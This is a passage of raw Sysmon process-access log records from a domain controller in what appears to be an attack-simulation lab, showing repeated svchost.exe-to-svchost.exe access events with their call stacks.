ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010230Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.029{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010229Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.029{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010228Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.029{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010227Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.029{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010226Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.029{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010225Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.029{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010224Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.029{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010223Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010222Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010221Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010220Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010219Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010218Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010217Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010216Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010215Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010214Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010213Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010212Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010211Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010210Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010209Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010208Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010207Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010206Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 